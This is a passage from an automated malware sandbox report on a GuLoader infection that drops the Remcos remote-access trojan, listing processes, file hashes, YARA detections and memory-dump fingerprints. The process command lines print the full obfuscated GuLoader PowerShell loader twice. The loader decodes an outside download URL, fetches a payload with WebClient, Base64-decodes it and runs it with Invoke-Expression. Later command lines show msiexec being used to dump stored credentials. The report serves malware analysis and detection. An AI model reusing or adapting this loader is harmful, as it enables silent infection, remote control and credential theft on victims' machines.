MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:11:05:17
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:11:05:30
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
                                                                                        Imagebase:0x700000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1680885153.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1661877856.000000000601E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1681623688.0000000009456000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:11:05:30
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:11:05:45
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                        Imagebase:0x200000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:10
                                                                                        Start time:11:06:01
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
                                                                                        Imagebase:0x200000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:11:06:01
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
                                                                                        Imagebase:0x200000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:11:06:02
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"
                                                                                        Imagebase:0x200000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:11:06:02
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Reset < >
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6g
                                                                                          • API String ID: 0-1031791518
                                                                                          • Opcode ID: d76b0aaf0eebb556a6701e3003d100dea59c137e89ca453d0adebdde2d088ffc
                                                                                          • Instruction ID: 87834a9808b4282321de199b62b905a2627238d58b31b81b7a514d468a09dd7a
                                                                                          • Opcode Fuzzy Hash: d76b0aaf0eebb556a6701e3003d100dea59c137e89ca453d0adebdde2d088ffc
                                                                                          • Instruction Fuzzy Hash: FF72F86290EBC54FE756972C88656B8BBE1EF5B250F0941FAD04DCB1E3D919AC09C382
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6g
                                                                                          • API String ID: 0-1031791518
                                                                                          • Opcode ID: e5de6b3a42010deb4372eebff5d33f15b27aa96aa8ee28997cc6c54fbf62307f
                                                                                          • Instruction ID: 6cb85e7e5cd28c74cbc805614bac651a276bf4c2267fbd468f3fbd33fc46fae2
                                                                                          • Opcode Fuzzy Hash: e5de6b3a42010deb4372eebff5d33f15b27aa96aa8ee28997cc6c54fbf62307f
                                                                                          • Instruction Fuzzy Hash: 88021A6290EBC54FE356972C8865669BFE1EF57250F0980FED04DCB1A3DD29AC498382
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1535188843.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6f16e04c813508ac3c2dbc965cfe987fe0577d58f2e6299c56b7d064019fc8f6
                                                                                          • Instruction ID: 00c30b9193e2b1b997fe1fb1c4a818bb92069a07a3e78dd314bb533127ad5fed
                                                                                          • Opcode Fuzzy Hash: 6f16e04c813508ac3c2dbc965cfe987fe0577d58f2e6299c56b7d064019fc8f6
                                                                                          • Instruction Fuzzy Hash: 2DF1D430909A8D8FEBA9DF28C8457E937E1FF55310F04866EE84DC73A1CB75A9458B81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1535188843.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e84cc9f4788b1cd059839ad27a98a666c4a9dcf9b5173cf133ce247a2affac1f
                                                                                          • Instruction ID: 54481a569e50540508c0ab77806c908c74e9183378691edfeeb4970d068e29ed
                                                                                          • Opcode Fuzzy Hash: e84cc9f4788b1cd059839ad27a98a666c4a9dcf9b5173cf133ce247a2affac1f
                                                                                          • Instruction Fuzzy Hash: 0CE1E570509A4D8FEBA8DF28C8557E977E1FF55350F04826EE84DC72A1CE79A8448BC1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6g
                                                                                          • API String ID: 0-1031791518
                                                                                          • Opcode ID: 6e010858da9cc02b94427245187d7c25a252458a3ff7451361009d7069e537e5
                                                                                          • Instruction ID: a3f9f4d1de8c0922d3122f01ee5f316299b307105bd22e1ad7bfe619f7de590e
                                                                                          • Opcode Fuzzy Hash: 6e010858da9cc02b94427245187d7c25a252458a3ff7451361009d7069e537e5
                                                                                          • Instruction Fuzzy Hash: A6E1F66290EBC58FE355D76C8865678BBE1EF5A350F1880FED04DC71A3DD28AC498382
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1535188843.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6g
                                                                                          • API String ID: 0-1031791518
                                                                                          • Opcode ID: cdd7c7591e2829434bcb7a0bd39a20ac6811f6f8181951fc7bebbb4e1dae33a4
                                                                                          • Instruction ID: e51a52f12d2ab95e9e94d8bad82c150eafedc915669a8ead0bd963a2e01649e6
                                                                                          • Opcode Fuzzy Hash: cdd7c7591e2829434bcb7a0bd39a20ac6811f6f8181951fc7bebbb4e1dae33a4
                                                                                          • Instruction Fuzzy Hash: 26C18A30A09A4D8FDF98DF58C485AAD7BF1FF69340F14816AD00DD72A6CA75E8858BC0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8hi
                                                                                          • API String ID: 0-2684157312
                                                                                          • Opcode ID: c3310709bc502c5e2aacc35975000fea2b5c032ef67ed1f5f21eda94e8ad0b6c
                                                                                          • Instruction ID: f83bb403d2ea8b009f6b948e55dc1baac46eb60dd629cf87dbb5b990ac747183
                                                                                          • Opcode Fuzzy Hash: c3310709bc502c5e2aacc35975000fea2b5c032ef67ed1f5f21eda94e8ad0b6c
                                                                                          • Instruction Fuzzy Hash: 1C21B592D1FBC68FF395A76C58652A8AFD1EF5B694F0850FAD08DC70E3D81818498392
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8571a0f95a40e7f3772beaba066e1ad896845bc6ee984360a3b5261654bef71e
                                                                                          • Instruction ID: 470a032a33634ba10e179717bdbb721a227e88e45b3c4e4666a8d3200b915fd9
                                                                                          • Opcode Fuzzy Hash: 8571a0f95a40e7f3772beaba066e1ad896845bc6ee984360a3b5261654bef71e
                                                                                          • Instruction Fuzzy Hash: 6EF1096290EBC68FE35A972C48655B9BFD1EF57650F0C41FED08DC71E3E918A8098382
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2186391b4e6812a1409794a6404d42bfb74c6f760491ddc87a768b5fa808d4c7
                                                                                          • Instruction ID: b36fb361751028203e6b476bcfd51bec5cfa126697b39c531194a069f547ab51
                                                                                          • Opcode Fuzzy Hash: 2186391b4e6812a1409794a6404d42bfb74c6f760491ddc87a768b5fa808d4c7
                                                                                          • Instruction Fuzzy Hash: 24C1592690EB8A8FE7A5972C8821574BBD2EF5A350F1481FAD44DC71A3DE15BC0AC3C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c780025d75d543c5f465e39befb36c9fa3f0219b06bd3f316bf051c940a8fb6
                                                                                          • Instruction ID: 04457460ec450af43c15fe9e01501fbeb982ab447dc4fe64deab9c0d7f636349
                                                                                          • Opcode Fuzzy Hash: 9c780025d75d543c5f465e39befb36c9fa3f0219b06bd3f316bf051c940a8fb6
                                                                                          • Instruction Fuzzy Hash: 6FC1086290E7C58FE7529B6C8864575BBE1EF5B250F0981FBD04DCB1E3D918AC09C392
                                                                                          Memory Dump Source
